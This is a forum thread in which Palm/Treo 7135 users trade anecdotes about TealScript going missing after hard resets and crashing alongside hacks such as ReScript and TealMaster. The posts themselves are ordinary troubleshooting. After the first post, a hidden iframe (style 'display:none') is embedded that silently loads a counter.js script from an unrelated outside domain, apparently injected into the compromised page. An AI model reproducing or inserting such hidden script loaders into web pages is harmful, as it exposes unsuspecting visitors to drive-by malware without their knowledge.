After being forced into G2, I have add Tealscript to my bevy of software. Recently my Palm crashed, (which it seems to do more often since firmware upgrade). I did a soft reset yet it did an automatic HARD reset. OK, no problem (so I thought).... I did a restore from my backup on the SD card everything seemed fine except Tealscript was missing.
Any clues where it went and why id didn't restore?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
This may or may not be relevent. However, I've noticed that Tealscript doesn't get along with some of the software I had installed on my 7135. For example, I had a hack that added a fancy keyboard to data entry. When I enabled it and tealscript I had lots of soft resest (particularly when Hotsyncing). Once I deleted the hack, the problem went away.
Anyway, I'm wondering if you problem is related to some software not getting along with TealScript.

Are you sure it was backed up in the first place?? I have TealScript on my 7135, and after an unexpected hard reset, it restored fine for me via BackupBuddyVFS. Check the backup directory on your SD card and make sure it's actually there.
I've been using TealScript along with the ReScript hack (which I'm using with Teal Master).
Whenever I have a fatal exception reset, (I'm down to about 3 per week) the hack will not re-initialize TealScript, even though TealMaster says it is doing this. So I still have to re-launch TS manually to get it back up and running.
Anyone else have this problem or know a workaround?
I've had the same problem and have not been able to find a work around. I wonder if that Hack might work better with tealmaster (as opposed to X-master or hackmaster).
It seems that Tealscript might be too sophisticated of a program to work on my 7135 together with all the other software that has been working fine up until now.
I hate G2, but I think I hate what Tealscript is doing to my palm even more. Now when my palm crashes, the proceedure to "restore" forces a hard reset even without pushing the 'back-light' button.

I was using TealMaster and had the same problems... I removed Tealmaster and the Rescript hack earlier today, and an hour later I had another hard reset crash. TealScript is definitely conflicting with something...
What I do know is that I installed TealScript and ReScript and started getting fatal exceptions. Never had them before. Removed TealScript and ReScript, still got fatal exceptions. Followed suggestion from another thread and did hard reset, deleted Saved_Preferences.prc and Unsaved_Preferences.prc from my BBVFS Card Directory. Restored all but these two files from my SD Card using BB and started entering the things I lost in my saved prefs file like reg. codes, etc. and now my phone is back to the rock I used to know. Of course it's only been 1 day.
I'm curious, what other hacks are you using? Maybe we can find the common link.
I'm trying to figure out what I have on my 7135 that is causing the coinflict. Problem is, some people have no problem using tealscript others do. Very frustrating. I even convinced Verizon to send me a replacement phone.
There is NO WAY that I'm am going to spend the time and energy installing one program at a time ..... running it for a few days.... installing another program.... running it a few days..... uintil I find the conflict. By the time I'm finished, G3 will be available.
Oddly enough, I've fund that my 7135 got a lot more stable when I deleted Vindigo. I had Vindigo lite installed, and if I ran it with Tealscript active, the phone would freeze and the only think I could do is a hard reset. I was also getting frequent crashers during hotsync.
So, I deleted VIndigo, and all hacks except ClockPop, EasyLaunch, and TealEcho. I have AfterBurner, MiddleCapsHack and ReScript installed, but none of these hacks are active and it is only a matter of time before I delete them.
Incidently, the phone was rock steady stable before I installed tealscript.
